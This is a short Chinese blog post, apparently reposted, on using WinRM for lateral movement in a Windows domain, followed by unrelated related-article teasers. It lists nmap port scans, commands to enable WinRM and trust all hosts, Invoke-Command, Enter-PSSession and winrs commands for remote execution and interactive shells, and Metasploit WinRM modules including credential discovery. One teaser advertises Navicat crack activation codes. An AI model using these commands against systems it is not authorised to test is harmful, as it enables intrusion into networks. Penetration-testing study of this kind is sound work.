1. 全栈程序员必看首页

WinRM横向移动

全栈程序员-站长 未分类 阅读 3

WinRM横向移动https blog csdn net SheXinK article details

目录

讲在前面

探测服务

Powershell执行

CMD执行

讲在前面

横向渗透过程中工具非常多,在笔者所接触朋友圈来看大部分习惯使用impacket工具集或PsTools工具集等,笔者本文介绍利用WinRM服务进行横向移动,当然我们也可以利用impacket进行哈希传递来执行winrm服务,使用此服务结合其他工具或漏洞进行组合拳,事半功倍

注意:

winrm服务访问需要特殊权限且知悉账号密码,此处笔者利用域管理员权限进行实验。

扫描端口

nmap -p 5985,5986 -sV 指定IP

WinRM横向移动

启动WinRM服务

winrm quickconfig winrm set winrm/config/Client @{AllowUnencrypted = "true"} Set-Item WSMan:localhost\client\trustedhosts -value * 或 Enable-PSRemoting -Force

WinRM横向移动

Powershell执行

Invoke-Command -ComputerName TARGET -ScriptBlock { dir c:\ } //命令执行 Invoke-Command -ComputerName TARGET -Credential 域名\用户名 -command {Get-Culture} //命令执行 Invoke-Command -ComputerName TARGET -Credential 域名\用户名 -ScriptBlock {Get-Culture} //命令执行 Enter-PSSession -ComputerName 10.2.0.100 -Credential administrator //返回交互式shell

WinRM横向移动

CMD执行

winrs -r:http://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx "ipconfig" winrs -r:https://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx "ipconfig" 获取交互式shell winrs -r:http://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx cmd winrs -r:https://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx cmd

MSF执行

exploit/windows/winrm/winrm_script_exec //WinRM代码执行模块配置 auxiliary/scanner/winrm/winrm_cmd //WinRM命令执行 auxiliary/scanner/winrm/winrm_auth_methods //WinRM Auth方法 auxiliary/scanner/winrm/winrm_login //WinRM凭证发现

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/232007.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • java销毁定时器_Java 定时器退出解决方案

    java销毁定时器_Java 定时器退出解决方案

    java销毁定时器_Java 定时器退出解决方案项目中用到了Timer每隔一段时间进行一些操作,现在发现有时候莫名其妙地挂在这个计时器上的操作都不做了,用“JConsole”查看其中的线程以后,发现这个定时器线程也不在了(定时器创建的时候带了名字Timertimer=newTimer(“MyTimer”),所以直接能看到),由于日志太多,之前的日志已经找不到了,所以没有办法看是否是有异常发生以及发生在哪里。初步估计,是不是由于T…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月17日
    3
  • 图像识别与卷积神经网络

    图像识别与卷积神经网络

    图像识别与卷积神经网络卷积神经网络是除了全连接神经网络以外另一个常用的网络结果,其在图像识别方面表现十分突出。本文结合Tensorflow:实战Google深度学习框架,讲述卷积神经网络常用数据集,介绍卷积网络的结构思想,以及通过TensorFlow实现其设计。1图像识别数据集MNIST手写体识别数据集解决是一个相对简单的问题,而对于更加复杂的类别,可以用到CIFAR数据集。比如CIFAR10数据集收集了来自10…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月30日
    45
  • Mysql和Hash作为数据库索引的优略

    Mysql和Hash作为数据库索引的优略

    Mysql和Hash作为数据库索引的优略1.hash表只能匹配是否相等,不能实现范围查找select * from xx where id > 23; 这时就没办法索引了2.当需要按照索引进行order by时,hash值没办法支持排序select * from xx order by score desc;如果score为建立索引的字段,hash值没办法辅助排序。3.组合索引可以支持部分索引查询,如(a,b,c)的组合索引,查询中只用到了阿和b也可以查询的,如果使用hash表,组合索引会将几个字段合并hash,没办法支持部分索引

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月9日
    7
  • spring c3p0连接池配置 com.mchange.v2.c3p0.combopooleddatasource

    spring c3p0连接池配置 com.mchange.v2.c3p0.combopooleddatasource

    spring c3p0连接池配置 com.mchange.v2.c3p0.combopooleddatasource3    30    1000    false    Test

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月8日
    25
  • navicat15万能激活码(最新序列号破解) idea

    navicat15万能激活码(最新序列号破解)

    navicat15万能激活码(最新序列号破解),https://javaforall.net/100143.html。详细ieda激活码不妨到全栈程序员必看教程网一起来了解一下吧!

    全栈程序员-站长的头像 全栈程序员-站长
    2022年3月19日
    584
  • linux驱动最新面试题(面试题整理,含答案)

    linux驱动最新面试题(面试题整理,含答案)

    linux驱动最新面试题(面试题整理,含答案)linux驱动面试题2018(面试题整理,含答案)版权声明:本文为博主原创文章,未经博主允许不得转载。转载请标明原址:https://blog.csdn.net/kai_zone/article/details/82021233前言:这篇文章主要是对linux驱动面试题一个整理跟总结,参考了很多网上的资料,基本涵盖linux驱动相关面试内容。我把他们大概的分为三部…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月20日
    30

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号